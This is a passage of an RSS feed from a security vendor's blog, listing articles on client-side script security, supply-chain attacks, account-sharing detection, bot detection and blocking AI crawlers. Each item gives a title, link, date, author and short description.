Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Best+Client-Side+Monitoring+Platforms+for+Fintech+in+2026&amp;bannerTitle=Best+client-side+monitoring+platform+for+fintech&amp;point=Meets+PCI+DSS+6.4.3+and+11.6.1&amp;point=Real+user+session+evidence&amp;point=Zero-JS+agent+for+Bank+of+the+West" length="0" type="image/webp"/></item><item><title>How to enforce device limits without cookies: GDPR-compliant account sharing prevention</title><link>https://cside.com/blog/account-sharing-prevention-gdpr-cookieless</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-prevention-gdpr-cookieless</guid><description>Cookie-based device tracking fails under GDPR and fails in private browsing.</description><pubDate>Mon, 29 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+enforce+device+limits+without+cookies%3A+GDPR-compliant+account+sharing+prevention&amp;bannerTitle=Cookieless%2C+GDPR-safe+device+limits&amp;point=No+cookies%2C+no+personal+data&amp;point=Works+in+private+browsing&amp;point=GDPR-compliant+device+limits" length="0" type="image/webp"/></item><item><title>Script Monitoring for Websites: 5 Best Platforms Compared</title><link>https://cside.com/blog/script-monitoring</link><guid isPermaLink="true">https://cside.com/blog/script-monitoring</guid><description>Script monitoring detects third-party script behaviour in real browser sessions. Platforms compared on coverage, baselining, and PCI DSS evidence.</description><pubDate>Mon, 29 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Script+Monitoring+for+Websites%3A+5+Best+Platforms+Compared&amp;bannerTitle=Third-party+script+monitoring+platforms&amp;point=Behavioural+baselining%2C+not+just+inventory&amp;point=Catch+supply-chain+compromise+at+runtime&amp;point=5+platforms+compared+side+by+side" length="0" type="image/webp"/></item><item><title>How to stop account sharing on gaming platforms: detecting boosting services and account selling without flagging households</title><link>https://cside.com/blog/account-sharing-prevention-gaming</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-prevention-gaming</guid><description>Account sharing in gaming takes three distinct forms: boosting, account selling, and household access. Device fingerprint history tells them apart.</description><pubDate>Sun, 28 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+stop+account+sharing+on+gaming+platforms%3A+detecting+boosting+services+and+account+selling+without+flagging+households&amp;bannerTitle=Stop+account+sharing+in+gaming&amp;point=Tell+boosting+from+household+play&amp;point=Detect+account+selling&amp;point=Never+flag+real+households" length="0" type="image/webp"/></item><item><title>Client-Side Security for eCommerce and Fintech: Top Platforms in 2026</title><link>https://cside.com/blog/client-side-security-ecommerce-fintech-platforms</link><guid isPermaLink="true">https://cside.com/blog/client-side-security-ecommerce-fintech-platforms</guid><description>eCommerce and fintech sites face Magecart skimming and PCI DSS 4.0.1. Five client-side security platforms reviewed for payment-page script protection.</description><pubDate>Sun, 28 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Client-Side+Security+for+eCommerce+and+Fintech%3A+Top+Platforms+in+2026&amp;bannerTitle=Client-side+security+for+e-commerce+and+fintech&amp;point=Blocks+Magecart+before+it+exfiltrates&amp;point=PCI+DSS+6.4.3+script+inventory+built+in&amp;point=Real-time+evidence+for+QSA+audits" length="0" type="image/webp"/></item><item><title>Why Sampling-Based Security Tools Miss Runtime Attacks on Gambling Platforms</title><link>https://cside.com/blog/why-sampling-tools-miss-runtime-attacks-gambling-platforms</link><guid isPermaLink="true">https://cside.com/blog/why-sampling-tools-miss-runtime-attacks-gambling-platforms</guid><description>Sampling tools watch under 10% of sessions, so geo-targeted and VIP attacks built to hit the unmonitored 90% pass clean audits while running live.</description><pubDate>Sun, 28 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/why-sampling-tools-miss-runtime-attacks-gambling-platforms.webp" length="0" type="image/webp"/></item><item><title>How to stop account sharing on ecommerce platforms: detecting shared memberships without blocking household shoppers</title><link>https://cside.com/blog/account-sharing-prevention-ecommerce</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-prevention-ecommerce</guid><description>Ecommerce account sharing takes three distinct forms: subscription, loyalty, and business account sharing, each with its own detection signature.</description><pubDate>Sat, 27 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+stop+account+sharing+on+ecommerce+platforms%3A+detecting+shared+memberships+without+blocking+household+shoppers&amp;bannerTitle=Account+sharing+in+ecommerce&amp;point=Detect+shared+memberships&amp;point=Catch+loyalty+credential+sharing&amp;point=No+friction+for+household+shoppers" length="0" type="image/webp"/></item><item><title>How to Detect and Block Unknown AI Agents on Your Website</title><link>https://cside.com/blog/how-to-block-unknown-ai-agents</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-unknown-ai-agents</guid><description>Unknown AI agents have no user-agent and ignore robots.txt. Learn the browser-layer signals that reveal undeclared agents and how to act on them.</description><pubDate>Sat, 27 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Detect+and+Block+Unknown+AI+Agents+on+Your+Website&amp;bannerTitle=How+to+block+unknown+AI+agents+on+your+site&amp;point=Beyond+the+named-crawler+list&amp;point=Behavioral%2C+not+signature-based&amp;point=For+every+AI+agent+not+yet+mapped" length="0" type="image/webp"/></item><item><title>UK Gambling Commission Licence Conditions and Third-Party Script Security: What Operators Need to Know</title><link>https://cside.com/blog/uk-gambling-commission-third-party-script-security</link><guid isPermaLink="true">https://cside.com/blog/uk-gambling-commission-third-party-script-security</guid><description>UKGC LCCP compliance requires a secure technical environment. Third-party scripts that redirect players or exfiltrate data create direct exposure.</description><pubDate>Sat, 27 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/uk-gambling-commission-third-party-script-security.webp" length="0" type="image/webp"/></item><item><title>Account sharing in B2B SaaS: how to enforce seat-based licensing without blocking legitimate teams</title><link>https://cside.com/blog/account-sharing-prevention-b2b-saas-seat-licensing</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-prevention-b2b-saas-seat-licensing</guid><description>B2B SaaS seat sharing is the most under-detected form of credential abuse.</description><pubDate>Fri, 26 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Account+sharing+in+B2B+SaaS%3A+how+to+enforce+seat-based+licensing+without+blocking+legitimate+teams&amp;bannerTitle=Seat+licensing+for+B2B+SaaS&amp;point=One+seat+across+a+whole+team&amp;point=Invisible+to+IP-based+controls&amp;point=Enforce+without+losing+customers" length="0" type="image/webp"/></item><item><title>How to Block Playwright Automation on Your Website</title><link>https://cside.com/blog/how-to-block-playwright</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-playwright</guid><description>Playwright runs real browsers that look identical to humans at the network layer. Here is how to detect it, and why robots.txt and IP blocks all fail.</description><pubDate>Fri, 26 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+Playwright+Automation+on+Your+Website&amp;bannerTitle=How+to+detect+and+block+Playwright+automation&amp;point=navigator.webdriver+%2B+CDP+fingerprints&amp;point=Blocks+headed+and+headless+modes&amp;point=Works+against+stealth-mode+Playwright" length="0" type="image/webp"/></item><item><title>Supply chain attack examples: Polymarket, Ledger ConnectKit, and polyfill.io</title><link>https://cside.com/blog/polymarket-client-side-supply-chain-attack</link><guid isPermaLink="true">https://cside.com/blog/polymarket-client-side-supply-chain-attack</guid><description>Real-world supply chain attack examples from Polymarket, Ledger ConnectKit, polyfill.io, and AppsFlyer, covering what they share and why standard defenses miss them.</description><pubDate>Fri, 26 Jun 2026 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/06/polymarket-client-side-supply-chain-attack.webp" length="0" type="image/webp"/></item><item><title>Shadow Tracking Pixels on Gambling Sites: The GDPR and Advertising Compliance Problem Operators Cannot See</title><link>https://cside.com/blog/shadow-pixels-gambling-sites-gdpr-compliance</link><guid isPermaLink="true">https://cside.com/blog/shadow-pixels-gambling-sites-gdpr-compliance</guid><description>Unauthorised Facebook, TikTok, or LinkedIn pixels on gambling sites trigger simultaneous GDPR and ad-platform liability. Here&apos;s why.</description><pubDate>Fri, 26 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/shadow-pixels-gambling-sites-gdpr-compliance.webp" length="0" type="image/webp"/></item><item><title>How to stop account sharing in airline loyalty programmes: detecting credential misuse without flagging frequent flyers</title><link>https://cside.com/blog/account-sharing-prevention-airlines-loyalty</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-prevention-airlines-loyalty</guid><description>Frequent flyer accounts are shared in three distinct patterns, each with different revenue and compliance implications.</description><pubDate>Thu, 25 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+stop+account+sharing+in+airline+loyalty+programmes%3A+detecting+credential+misuse+without+flagging+frequent+flyers&amp;bannerTitle=Account+sharing+in+airline+loyalty&amp;point=Protect+frequent+flyer+miles&amp;point=Spot+credential+sharing+patterns&amp;point=Allow+genuine+multi-location+travel" length="0" type="image/webp"/></item><item><title>How to Block PerplexityBot on Your Website</title><link>https://cside.com/blog/how-to-block-perplexitybot</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-perplexitybot</guid><description>PerplexityBot crawls your content for AI search results. Learn how to block it, why it faced copyright criticism, and how Perplexity Shopper differs.</description><pubDate>Thu, 25 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+PerplexityBot+on+Your+Website&amp;bannerTitle=How+to+block+PerplexityBot+in+2026&amp;point=Robots.txt+%2B+IP+filter+%2B+JS+challenge&amp;point=Handles+known+Perplexity+user+agents&amp;point=Verify+after%3A+still-crawling+audit" length="0" type="image/webp"/></item><item><title>Shadow GTM Containers on Multi-Brand Gambling Platforms: What They Are and How to Detect Them</title><link>https://cside.com/blog/shadow-gtm-containers-multi-brand-gambling-platforms</link><guid isPermaLink="true">https://cside.com/blog/shadow-gtm-containers-multi-brand-gambling-platforms</guid><description>Unauthorised GTM containers can run any JavaScript on your gambling domains. How shadow containers appear, what they do, and why tools miss them.</description><pubDate>Thu, 25 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/shadow-gtm-containers-multi-brand-gambling-platforms.webp" length="0" type="image/webp"/></item><item><title>How to detect and prevent account sharing without hurting legitimate users</title><link>https://cside.com/blog/account-sharing-detection-without-false-positives</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-detection-without-false-positives</guid><description>The biggest objection to account sharing detection is false positives: what if we flag a subscriber who is just using multiple devices?</description><pubDate>Wed, 24 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+detect+and+prevent+account+sharing+without+hurting+legitimate+users&amp;bannerTitle=Account+sharing+detection%2C+no+false+positives&amp;point=Passive%2C+no-friction+detection&amp;point=14-day+observation+window&amp;point=Tell+multi-device+from+sharing" length="0" type="image/webp"/></item><item><title>How to Block GPTBot (and Why You Might Not Want To)</title><link>https://cside.com/blog/how-to-block-gptbot</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-gptbot</guid><description>GPTBot crawls your site to train OpenAI models. Here is how to block it with robots.txt and IP ranges, plus what that block still leaves uncovered.</description><pubDate>Wed, 24 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+GPTBot+%28and+Why+You+Might+Not+Want+To%29&amp;bannerTitle=How+to+block+GPTBot+%28and+why+you+might+not%29&amp;point=Robots.txt+%2B+IP+ranges+%2B+verification&amp;point=Impact+on+ChatGPT+search+citations&amp;point=What+blocking+still+leaves+open" length="0" type="image/webp"/></item><item><title>Session Recording Tools on Gambling Sites: The PII Exfiltration Risk Operators Are Missing</title><link>https://cside.com/blog/session-recording-tools-gambling-sites-pii-risk</link><guid isPermaLink="true">https://cside.com/blog/session-recording-tools-gambling-sites-pii-risk</guid><description>Session recording tools on gambling sites can silently exfiltrate player PII when misconfigured or compromised. Here are the three ways it happens.</description><pubDate>Wed, 24 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/session-recording-tools-gambling-sites-pii-risk.webp" length="0" type="image/webp"/></item><item><title>Account sharing detection: how to close the enforcement gap that concurrent session limits miss</title><link>https://cside.com/blog/account-sharing-detection-concurrent-sessions-enforcement</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-detection-concurrent-sessions-enforcement</guid><description>Concurrent session limits flag the obvious case. They do not distinguish between a single user on two devices and two people sharing one account.</description><pubDate>Tue, 23 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Account+sharing+detection%3A+how+to+close+the+enforcement+gap+that+concurrent+session+limits+miss&amp;bannerTitle=Account+sharing+detection+beyond+limits&amp;point=Tell+one+user+from+two+sharers&amp;point=Close+the+detection-to-enforcement+gap&amp;point=Browser-layer+evidence%2C+not+guesses" length="0" type="image/webp"/></item><item><title>Catching bots by the way they move: behavioral cursor detection</title><link>https://cside.com/blog/catching-bots-by-how-they-move</link><guid isPermaLink="true">https://cside.com/blog/catching-bots-by-how-they-move</guid><description>How cside&apos;s cursor_v2 model scores mouse movement to catch the stealth bots that already beat fingerprint and IP checks.</description><pubDate>Tue, 23 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Avneh Bhatia</author><enclosure url="https://cside.com/content/images/2026/06/catching-bots-by-how-they-move.webp" length="0" type="image/webp"/></item><item><title>How to Block Applebot-Extended on Your Website</title><link>https://cside.com/blog/how-to-block-applebot-extended</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-applebot-extended</guid><description>Applebot-Extended is Apple&apos;s AI training crawler that feeds Apple Intelligence. Learn how it differs from Applebot and how to opt out via robots.txt.</description><pubDate>Tue, 23 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+Applebot-Extended+on+Your+Website&amp;bannerTitle=How+to+block+Applebot-Extended+in+2026&amp;point=Robots.txt+directive+and+IP+filters&amp;point=Stops+Apple+Intelligence+training&amp;point=Preserves+normal+Applebot+indexing" length="0" type="image/webp"/></item><item><title>How to Monitor Third-Party Scripts Across 100 or More Casino Domains</title><link>https://cside.com/blog/monitoring-third-party-scripts-100-casino-domains</link><guid isPermaLink="true">https://cside.com/blog/monitoring-third-party-scripts-100-casino-domains</guid><description>A practical guide to monitoring third-party scripts across 100-plus casino domains: script sprawl, cross-domain alerts, and scaling cside.</description><pubDate>Tue, 23 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/monitoring-third-party-scripts-100-casino-domains.webp" length="0" type="image/webp"/></item><item><title>NJDPA: Guide to Requirements + Website Compliance</title><link>https://cside.com/blog/njdpa-guide-to-requirements-website-compliance</link><guid isPermaLink="true">https://cside.com/blog/njdpa-guide-to-requirements-website-compliance</guid><description>Get a clear breakdown of the New Jersey Data Privacy Act rules, enforcement timelines, and how to manage third-party scripts for compliance.</description><pubDate>Tue, 23 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/NJDPA---New-Jersey-Data-Privacy-Act---Requirements-and-Website-Compliance.webp" length="0" type="image/webp"/></item><item><title>Agentic AI Security Risks for Websites: Privacy, Compliance, and Detection</title><link>https://cside.com/blog/agentic-ai-website-security-risks</link><guid isPermaLink="true">https://cside.com/blog/agentic-ai-website-security-risks</guid><description>Agentic AI browsers bypass cookie consent, execute real JavaScript, and create GDPR compliance gaps that CDN-level bot detection cannot see.</description><pubDate>Mon, 22 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Agentic+AI+Security+Risks+for+Websites%3A+Privacy%2C+Compliance%2C+and+Detection&amp;bannerTitle=Agentic+AI%3A+Security+Risks+for+Websites&amp;point=Bypass+cookie+consent+interactions&amp;point=Create+hidden+GDPR+compliance+gaps&amp;point=Evade+standard+bot+detection" length="0" type="image/webp"/></item><item><title>Catching bots that don&apos;t want to be caught: inside a two-stage neural detection stack</title><link>https://cside.com/blog/catching-bots-that-dont-want-to-be-caught</link><guid isPermaLink="true">https://cside.com/blog/catching-bots-that-dont-want-to-be-caught</guid><description>How a two-stage neural stack catches stealth browsers, proxied scrapers, and LLM agents that pass every fingerprint check, and where it hits a wall.</description><pubDate>Mon, 22 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Avneh Bhatia</author><enclosure url="https://cside.com/content/images/2026/06/catching-bots-that-dont-want-to-be-caught.webp" length="0" type="image/webp"/></item><item><title>How to Block DeepSeekBot on Your Website</title><link>https://cside.com/blog/how-to-block-deepseekbot</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-deepseekbot</guid><description>DeepSeekBot crawls your site for a Chinese AI company. Learn how to block it with robots.txt, IP rules, and the real data sovereignty risks it raises.</description><pubDate>Mon, 22 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+DeepSeekBot+on+Your+Website&amp;bannerTitle=How+to+Block+DeepSeekBot&amp;point=Block+it+via+robots.txt+and+IP+rules&amp;point=Understand+the+data+sovereignty+risks&amp;point=Weaker+robots.txt+record+than+GPTBot" length="0" type="image/webp"/></item><item><title>Malta Gaming Authority Compliance and Client-Side Script Security: What MGA-Licensed Operators Need to Cover</title><link>https://cside.com/blog/mga-malta-gaming-authority-client-side-script-compliance</link><guid isPermaLink="true">https://cside.com/blog/mga-malta-gaming-authority-client-side-script-compliance</guid><description>MGA rules require a secure, auditable platform. Third-party JavaScript on licensed sites is a compliance gap most operators have not audited.</description><pubDate>Mon, 22 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/mga-malta-gaming-authority-client-side-script-compliance.webp" length="0" type="image/webp"/></item><item><title>Third-Party Script Attacks on iGaming Platforms in 2026: The New Attack Surface Operators Are Missing</title><link>https://cside.com/blog/igaming-third-party-script-attacks-2026-overview</link><guid isPermaLink="true">https://cside.com/blog/igaming-third-party-script-attacks-2026-overview</guid><description>Third-party JavaScript is the primary unmonitored attack surface on iGaming platforms. The seven attack classes, and why standard tools miss them.</description><pubDate>Sun, 21 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/igaming-third-party-script-attacks-2026-overview.webp" length="0" type="image/webp"/></item><item><title>GDPR and Online Gambling: Why Unauthorised Pixels Create a Dual Liability Problem</title><link>https://cside.com/blog/gdpr-gambling-unauthorised-pixels-dual-liability</link><guid isPermaLink="true">https://cside.com/blog/gdpr-gambling-unauthorised-pixels-dual-liability</guid><description>Unauthorised pixels on gambling sites trigger GDPR liability and ad-account bans at once, even when the operator never installed them. Here&apos;s why.</description><pubDate>Sat, 20 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/gdpr-gambling-unauthorised-pixels-dual-liability.webp" length="0" type="image/webp"/></item><item><title>HIPAA Website Tracking Compliance: The Healthcare Guide to Third-Party Scripts</title><link>https://cside.com/blog/hipaa-website-tracking-compliance-healthcare</link><guid isPermaLink="true">https://cside.com/blog/hipaa-website-tracking-compliance-healthcare</guid><description>HHS OCR ruled that tracking pixels and third-party scripts on healthcare websites can expose PHI. Here&apos;s what covered entities must do to comply.</description><pubDate>Sat, 20 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=HIPAA+Website+Tracking+Compliance%3A+The+Healthcare+Guide+to+Third-Party+Scripts&amp;bannerTitle=HIPAA+website+tracking+compliance&amp;point=OCR+guidance%3A+IP+addresses+can+be+PHI&amp;point=Meta+Pixel+and+GA+risk+on+patient+pages&amp;point=How+to+audit+and+control+tracking+scripts" length="0" type="image/webp"/></item><item><title>How to Block Bytespider (TikTok&apos;s AI Crawler)</title><link>https://cside.com/blog/how-to-block-bytespider</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-bytespider</guid><description>Bytespider crawls your site for Bytedance&apos;s AI systems. Learn how to block it with robots.txt and IP ranges, and the data sovereignty concerns.</description><pubDate>Sat, 20 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+Bytespider+%28TikTok%27s+AI+Crawler%29&amp;bannerTitle=How+to+block+Bytespider+in+2026&amp;point=ByteDance%27s+aggressive+AI+crawler&amp;point=Robots.txt+%2B+IP+%2B+JS+challenge+stack&amp;point=Preserves+your+TikTok+ads+footprint" length="0" type="image/webp"/></item><item><title>How Malicious Scripts Hijack Casino Player Journeys</title><link>https://cside.com/blog/casino-player-journey-hijacking-malicious-scripts</link><guid isPermaLink="true">https://cside.com/blog/casino-player-journey-hijacking-malicious-scripts</guid><description>Script-injected redirects divert casino players before they reach the lobby. Network tools miss them entirely. Here&apos;s how detection must work.</description><pubDate>Fri, 19 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/cside-blog-hero-malicious-scripts-hijack-casino.webp" length="0" type="image/webp"/></item><item><title>Client-Side Script Security for APAC Online Gambling Operators</title><link>https://cside.com/blog/client-side-security-apac-online-gambling-operators</link><guid isPermaLink="true">https://cside.com/blog/client-side-security-apac-online-gambling-operators</guid><description>How APAC online gambling operators in Japan, Singapore, the Philippines, and Australia can monitor third-party scripts across real player sessions.</description><pubDate>Fri, 19 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/client-side-security-apac-online-gambling-operators.webp" length="0" type="image/webp"/></item><item><title>How to Block Amazon Buy for Me on Your Website</title><link>https://cside.com/blog/how-to-block-amazon-buy-for-me</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-amazon-buy-for-me</guid><description>Amazon Buy for Me shops your site for Prime users. Learn how it collects pricing and product data and how browser-layer detection gives you control.</description><pubDate>Fri, 19 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+Amazon+Buy+for+Me+on+Your+Website&amp;bannerTitle=How+to+block+Amazon+Buy+for+Me+on+your+storefront&amp;point=Detects+the+Amazon+shopping+agent&amp;point=Preserves+your+checkout+and+margin&amp;point=Works+with+headless+and+Shopify" length="0" type="image/webp"/></item><item><title>How Compromised Affiliate Scripts Steal Online Casino Revenue</title><link>https://cside.com/blog/affiliate-script-compromise-online-casino-revenue</link><guid isPermaLink="true">https://cside.com/blog/affiliate-script-compromise-online-casino-revenue</guid><description>Compromised affiliate scripts redirect players, steal commissions, and manipulate UTM attribution on casino pages, silently and at scale.</description><pubDate>Thu, 18 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/cside-blog-hero-compromised-affiliate-scripts.webp" length="0" type="image/webp"/></item><item><title>How Browser Extensions Attack Online Casino Players: What Operators Can Do About It</title><link>https://cside.com/blog/browser-extension-attacks-online-casino-players</link><guid isPermaLink="true">https://cside.com/blog/browser-extension-attacks-online-casino-players</guid><description>Browser extensions can steal session tokens and hijack payments on casino sites. Here&apos;s how they attack, why servers miss it, and how to detect them.</description><pubDate>Thu, 18 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/cside-blog-hero-browser-extensions-attack-casino.webp" length="0" type="image/webp"/></item><item><title>How to Block CCBot (Common Crawl&apos;s AI Crawler)</title><link>https://cside.com/blog/how-to-block-ccbot</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-ccbot</guid><description>CCBot feeds Common Crawl datasets used to train GPT-3, BLOOM, LLaMA, and many other AI models. Learn how to block it and what blocking actually does.</description><pubDate>Thu, 18 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+CCBot+%28Common+Crawl%27s+AI+Crawler%29&amp;bannerTitle=How+to+block+CCBot+from+Common+Crawl&amp;point=The+crawler+that+feeds+most+LLMs&amp;point=Robots.txt+and+IP+filter+recipe&amp;point=Verifies+compliance+after+the+block" length="0" type="image/webp"/></item><item><title>PCI DSS 6.4.3 Script Inventory and Authorization: How to Build the Record</title><link>https://cside.com/blog/how-to-comply-with-pci-dss-6-4-3-script-authorization-inventory</link><guid isPermaLink="true">https://cside.com/blog/how-to-comply-with-pci-dss-6-4-3-script-authorization-inventory</guid><description>The script inventory and authorization workflow for PCI DSS 6.4.3: what fields each record needs, who signs off, and a sample inventory row to copy.</description><pubDate>Thu, 18 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=PCI+DSS+6.4.3+Script+Inventory+and+Authorization%3A+How+to+Build+the+Record&amp;bannerTitle=PCI+DSS+6.4.3+script+inventory&amp;point=What+each+inventory+row+needs&amp;point=What+an+authorization+record+holds&amp;point=How+to+keep+it+from+going+stale" length="0" type="image/webp"/></item><item><title>How to Block AI-Powered Fake Account Creation with Signup Shield</title><link>https://cside.com/blog/signup-shield-block-ai-fake-account-creation</link><guid isPermaLink="true">https://cside.com/blog/signup-shield-block-ai-fake-account-creation</guid><description>AI agents create fake accounts with human-like behaviour that defeats CAPTCHA. Learn the browser-layer signals that reveal automated registrations.</description><pubDate>Thu, 18 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+AI-Powered+Fake+Account+Creation+with+Signup+Shield&amp;bannerTitle=Signup+Shield%3A+block+AI+fake-account+creation&amp;point=Stops+bulk+AI+signup+fraud+in+real+time&amp;point=Detects+LLM-driven+form+filling&amp;point=Preserves+human+signup+UX" length="0" type="image/webp"/></item><item><title>Fixing TLS timeout handling in the cside Edge</title><link>https://cside.com/blog/fixing-edge-tls-handshake-timeouts</link><guid isPermaLink="true">https://cside.com/blog/fixing-edge-tls-handshake-timeouts</guid><description>How cside improved TLS reliability in the Rust Edge by moving handshake work out of the Axum accept path and into bounded Tokio tasks.</description><pubDate>Tue, 16 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Learning</category><author>Taym Haddadi</author><enclosure url="https://cside.com/images/cside-blog-hero-edge-tls-timeouts.webp" length="0" type="image/webp"/></item><item><title>How to Block ClaudeBot on Your Website</title><link>https://cside.com/blog/how-to-block-claudebot</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-claudebot</guid><description>ClaudeBot crawls your site to train Anthropic&apos;s Claude models. Here is how to block it with robots.txt and IP ranges, and what the block still misses.</description><pubDate>Tue, 16 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+ClaudeBot+on+Your+Website&amp;bannerTitle=How+to+block+ClaudeBot+from+Anthropic&amp;point=Robots.txt+directive+and+IP+ranges&amp;point=Distinguishes+training+vs.+citation&amp;point=Preserves+Anthropic+citations+if+wanted" length="0" type="image/webp"/></item><item><title>How to Prevent Fake Account Creation with cside Signup Shield: Why Browser-Layer Detection Catches What Email Verification Misses</title><link>https://cside.com/blog/signup-shield-prevent-fake-account-creation</link><guid isPermaLink="true">https://cside.com/blog/signup-shield-prevent-fake-account-creation</guid><description>Email verification confirms a mailbox exists. It cannot see the browser. Here is why browser-layer detection catches fake account creation it misses.</description><pubDate>Mon, 15 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Prevent+Fake+Account+Creation+with+cside+Signup+Shield%3A+Why+Browser-Layer+Detection+Catches+What+Email+Verification+Misses&amp;point=New+account+fraud+jumped+31%25+in+2025&amp;point=Email+and+OTP+verify+the+endpoint%2C+not+the+registrant&amp;point=Browser-layer+detection+fires+before+verification" length="0" type="image/webp"/></item><item><title>Web Supply Chain Attack Explained: The Polyfill.io Incident, Full Timeline &amp; Lessons (2024-2026)</title><link>https://cside.com/blog/polyfill-io-supply-chain-attack-timeline</link><guid 